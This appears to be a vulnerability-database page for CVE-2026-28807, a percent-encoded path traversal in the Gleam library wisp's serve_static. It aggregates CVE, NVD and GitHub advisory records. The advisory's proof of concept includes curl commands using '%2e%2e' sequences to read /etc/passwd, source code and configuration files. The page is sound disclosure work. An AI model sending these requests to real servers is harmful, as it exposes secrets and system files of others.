Vulnerability-Lookup

CVE-2026-28807 (GCVE-0-2026-28807)

Vulnerability from cvelistv5 – Published: 2026-03-10 21:34 – Updated: 2026-03-12 03:58

Title

Path Traversal in wisp.serve_static allows arbitrary file read

Summary

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal. The wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read. An unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files. This issue affects wisp: from 2.1.1 before 2.2.1.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

EEF

References

URL

Tags

	https://github.com/gleam-wisp/wisp/security/advis…	vendor-advisory
	https://github.com/gleam-wisp/wisp/commit/161118c…	patch

Impacted products

Vendor

Product

Version

gleam-wisp

wisp

Affected: 2.1.1 , < 2.2.1 (semver)
Affected: pkg:hex/wisp@2.1.1 , < pkg:hex/wisp@2.2.1 (purl)
cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*

gleam-wisp

wisp

Affected: 129dcb1fe10ab1e676145d91477535e1c90ab550 , < 161118c431047f7ef1ff7cabfcc38981877fdd93 (git)
Affected: pkg:github/gleam-wisp/wisp@129dcb1fe10ab1e676145d91477535e1c90ab550 , < pkg:github/gleam-wisp/wisp@161118c431047f7ef1ff7cabfcc38981877fdd93 (purl)
cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*

Credits

John Downey Louis Pilfold

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-28807",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-11T14:20:19.768057Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-11T14:20:59.654Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "packageName": "wisp",
          "packageURL": "pkg:hex/wisp",
          "product": "wisp",
          "repo": "https://github.com/gleam-wisp/wisp",
          "vendor": "gleam-wisp",
          "versions": [
            {
              "lessThan": "2.2.1",
              "status": "affected",
              "version": "2.1.1",
              "versionType": "semver"
            },
            {
              "lessThan": "pkg:hex/wisp@2.2.1",
              "status": "affected",
              "version": "pkg:hex/wisp@2.1.1",
              "versionType": "purl"
            }
          ]
        },
        {
          "collectionURL": "https://github.com",
          "cpes": [
            "cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "packageName": "gleam-wisp/wisp",
          "packageURL": "pkg:github/gleam-wisp/wisp",
          "product": "wisp",
          "repo": "https://github.com/gleam-wisp/wisp.git",
          "vendor": "gleam-wisp",
          "versions": [
            {
              "lessThan": "161118c431047f7ef1ff7cabfcc38981877fdd93",
              "status": "affected",
              "version": "129dcb1fe10ab1e676145d91477535e1c90ab550",
              "versionType": "git"
            },
            {
              "lessThan": "pkg:github/gleam-wisp/wisp@161118c431047f7ef1ff7cabfcc38981877fdd93",
              "status": "affected",
              "version": "pkg:github/gleam-wisp/wisp@129dcb1fe10ab1e676145d91477535e1c90ab550",
              "versionType": "purl"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "2.2.1",
                  "versionStartIncluding": "2.1.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ],
          "operator": "AND"
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "John Downey"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Louis Pilfold"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\u003cp\u003eThe \u003ctt\u003ewisp.serve_static\u003c/tt\u003e function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence \u003ctt\u003e%2e%2e\u003c/tt\u003e passes through \u003ctt\u003estring.replace\u003c/tt\u003e unchanged, then \u003ctt\u003euri.percent_decode\u003c/tt\u003e converts it to \u003ctt\u003e..\u003c/tt\u003e, which the OS resolves as directory traversal when the file is read.\u003c/p\u003e\u003cp\u003eAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\u003c/p\u003e\u003cp\u003eThis issue affects wisp: from 2.1.1 before 2.2.1.\u003c/p\u003e"
            }
          ],
          "value": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\n\nThe wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.\n\nAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\n\nThis issue affects wisp: from 2.1.1 before 2.2.1."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-139",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-139 Relative Path Traversal"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T03:58:37.598Z",
        "orgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "shortName": "EEF"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Path Traversal in wisp.serve_static allows arbitrary file read",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
    "assignerShortName": "EEF",
    "cveId": "CVE-2026-28807",
    "datePublished": "2026-03-10T21:34:47.859Z",
    "dateReserved": "2026-03-03T14:40:00.590Z",
    "dateUpdated": "2026-03-12T03:58:37.598Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-28807\",\"sourceIdentifier\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"published\":\"2026-03-10T22:16:18.640\",\"lastModified\":\"2026-03-11T13:52:47.683\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\\n\\nThe wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.\\n\\nAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\\n\\nThis issue affects wisp: from 2.1.1 before 2.2.1.\"},{\"lang\":\"es\",\"value\":\"Vulnerabilidad de Limitaci\u00f3n Inadecuada de un Nombre de Ruta a un Directorio Restringido (\u0027Salto de Ruta\u0027) en gleam-wisp wisp permite la lectura arbitraria de archivos mediante salto de ruta codificado en porcentaje.\\n\\nLa funci\u00f3n wisp.serve_static es vulnerable a salto de ruta porque la sanitizaci\u00f3n se ejecuta antes de la decodificaci\u00f3n de porcentaje. La secuencia codificada %2e%2e pasa por string.replace sin cambios, luego uri.percent_decode la convierte a .., que el sistema operativo resuelve como salto de directorio cuando se lee el archivo.\\n\\nUn atacante no autenticado puede leer cualquier archivo legible por el proceso de la aplicaci\u00f3n en una \u00fanica solicitud HTTP, incluyendo c\u00f3digo fuente de la aplicaci\u00f3n, archivos de configuraci\u00f3n, secretos y archivos del sistema.\\n\\nEste problema afecta a wisp: desde 2.1.1 antes de 2.2.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28807\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-11T14:20:19.768057Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-11T14:20:53.092Z\"}}], \"cna\": {\"title\": \"Path Traversal in wisp.serve_static allows arbitrary file read\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"John Downey\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"Louis Pilfold\"}], \"impacts\": [{\"capecId\": \"CAPEC-139\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-139 Relative Path Traversal\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 8.7, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\", \"exploitMaturity\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/gleam-wisp/wisp\", \"vendor\": \"gleam-wisp\", \"product\": \"wisp\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.1.1\", \"lessThan\": \"2.2.1\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"pkg:hex/wisp@2.1.1\", \"lessThan\": \"pkg:hex/wisp@2.2.1\", \"versionType\": \"purl\"}], \"packageURL\": \"pkg:hex/wisp\", \"packageName\": \"wisp\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/gleam-wisp/wisp.git\", \"vendor\": \"gleam-wisp\", \"product\": \"wisp\", \"versions\": [{\"status\": \"affected\", \"version\": \"129dcb1fe10ab1e676145d91477535e1c90ab550\", \"lessThan\": \"161118c431047f7ef1ff7cabfcc38981877fdd93\", \"versionType\": \"git\"}, {\"status\": \"affected\", \"version\": \"pkg:github/gleam-wisp/wisp@129dcb1fe10ab1e676145d91477535e1c90ab550\", \"lessThan\": \"pkg:github/gleam-wisp/wisp@161118c431047f7ef1ff7cabfcc38981877fdd93\", \"versionType\": \"purl\"}], \"packageURL\": \"pkg:github/gleam-wisp/wisp\", \"packageName\": \"gleam-wisp/wisp\", \"collectionURL\": \"https://github.com\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"Vulnogram 1.0.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\\n\\nThe wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.\\n\\nAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\\n\\nThis issue affects wisp: from 2.1.1 before 2.2.1.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\u003cp\u003eThe \u003ctt\u003ewisp.serve_static\u003c/tt\u003e function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence \u003ctt\u003e%2e%2e\u003c/tt\u003e passes through \u003ctt\u003estring.replace\u003c/tt\u003e unchanged, then \u003ctt\u003euri.percent_decode\u003c/tt\u003e converts it to \u003ctt\u003e..\u003c/tt\u003e, which the OS resolves as directory traversal when the file is read.\u003c/p\u003e\u003cp\u003eAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\u003c/p\u003e\u003cp\u003eThis issue affects wisp: from 2.1.1 before 2.2.1.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"2.2.1\", \"versionStartIncluding\": \"2.1.1\"}], \"operator\": \"OR\"}], \"operator\": \"AND\"}], \"providerMetadata\": {\"orgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"shortName\": \"EEF\", \"dateUpdated\": \"2026-03-12T03:58:37.598Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-28807\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-12T03:58:37.598Z\", \"dateReserved\": \"2026-03-03T14:40:00.590Z\", \"assignerOrgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"datePublished\": \"2026-03-10T21:34:47.859Z\", \"assignerShortName\": \"EEF\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-28807

Vulnerability from fkie_nvd - Published: 2026-03-10 22:16 - Updated: 2026-03-11 13:52

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\n\nThe wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.\n\nAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\n\nThis issue affects wisp: from 2.1.1 before 2.2.1."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de Limitaci\u00f3n Inadecuada de un Nombre de Ruta a un Directorio Restringido (\u0027Salto de Ruta\u0027) en gleam-wisp wisp permite la lectura arbitraria de archivos mediante salto de ruta codificado en porcentaje.\n\nLa funci\u00f3n wisp.serve_static es vulnerable a salto de ruta porque la sanitizaci\u00f3n se ejecuta antes de la decodificaci\u00f3n de porcentaje. La secuencia codificada %2e%2e pasa por string.replace sin cambios, luego uri.percent_decode la convierte a .., que el sistema operativo resuelve como salto de directorio cuando se lee el archivo.\n\nUn atacante no autenticado puede leer cualquier archivo legible por el proceso de la aplicaci\u00f3n en una \u00fanica solicitud HTTP, incluyendo c\u00f3digo fuente de la aplicaci\u00f3n, archivos de configuraci\u00f3n, secretos y archivos del sistema.\n\nEste problema afecta a wisp: desde 2.1.1 antes de 2.2.1."
    }
  ],
  "id": "CVE-2026-28807",
  "lastModified": "2026-03-11T13:52:47.683",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-10T22:16:18.640",
  "references": [
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"
    }
  ],
  "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "type": "Secondary"
    }
  ]
}

GHSA-H7CJ-J2VV-QW8R

Vulnerability from github – Published: 2026-03-11 00:11 – Updated: 2026-03-11 05:45

Summary

Wisp Vulnerable to Path Traversal

Details

Summary

wisp.serve_static is vulnerable to arbitrary file read via percent-encoded path traversal (%2e%2e). The directory traversal sanitization runs before percent-decoding, allowing encoded .. sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.

Details

In src/wisp.gleam, serve_static processes the request path in this order:

let path =
  path
  |> string.drop_start(string.length(prefix))
  |> string.replace(each: "..", with: "")   // Step 1: sanitize
  |> filepath.join(directory, _)

let path = case uri.percent_decode(path) {  // Step 2: decode
  Ok(p) -> p
  Error(_) -> path
}

Sanitization (step 1) strips literal .. but runs before percent-decoding (step 2). The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.

PoC

Any application using wisp.serve_static:

fn handle_request(req: wisp.Request) -> wisp.Response {
  use <- wisp.serve_static(req, under: "/static", from: priv_directory())
  wisp.not_found()
}

Exploit (requires --path-as-is to prevent client-side normalization):

# Read /etc/passwd
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

# Read project source code
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam"

# Read project config
curl -s --path-as-is \
  "http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml"

Impact

This is a path traversal / arbitrary file read vulnerability (CWE-22). Any application using wisp.serve_static is affected. An unauthenticated attacker can read:

Application source code
Configuration and secrets in priv/
.env files, secret_key_base, private keys
System files (/etc/passwd, /etc/shadow if permissions allow)

Workaround

Copy the fixed implementation to your codebase and replace references to wisp.serve_static with this version in your codebase.

References

Commit that introduced the vulnerability: https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550
Patch Commit: https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "wisp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.1"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:11:39Z",
    "nvd_published_at": "2026-03-10T22:16:18Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`wisp.serve_static` is vulnerable to arbitrary file read via percent-encoded path traversal (`%2e%2e`). The directory traversal sanitization runs before percent-decoding, allowing encoded `..` sequences to bypass the filter. An unauthenticated attacker can read any file readable by the application process in a single HTTP request.\n\n### Details\n\nIn `src/wisp.gleam`, `serve_static` processes the request path in this order:\n\n```gleam\nlet path =\n  path\n  |\u003e string.drop_start(string.length(prefix))\n  |\u003e string.replace(each: \"..\", with: \"\")   // Step 1: sanitize\n  |\u003e filepath.join(directory, _)\n\nlet path = case uri.percent_decode(path) {  // Step 2: decode\n  Ok(p) -\u003e p\n  Error(_) -\u003e path\n}\n```\n\nSanitization (step 1) strips literal `..` but runs **before** percent-decoding (step 2). The encoded sequence `%2e%2e` passes through `string.replace` unchanged, then `uri.percent_decode` converts it to `..`, which the OS resolves as directory traversal when the file is read.\n\n### PoC\n\nAny application using `wisp.serve_static`:\n\n```gleam\nfn handle_request(req: wisp.Request) -\u003e wisp.Response {\n  use \u003c- wisp.serve_static(req, under: \"/static\", from: priv_directory())\n  wisp.not_found()\n}\n```\n\nExploit (requires `--path-as-is` to prevent client-side normalization):\n\n```bash\n# Read /etc/passwd\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n\n# Read project source code\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam\"\n\n# Read project config\ncurl -s --path-as-is \\\n  \"http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml\"\n```\n\n### Impact\n\nThis is a **path traversal / arbitrary file read** vulnerability (CWE-22). Any application using `wisp.serve_static` is affected. An unauthenticated attacker can read:\n\n- Application source code\n- Configuration and secrets in `priv/`\n- `.env` files, `secret_key_base`, private 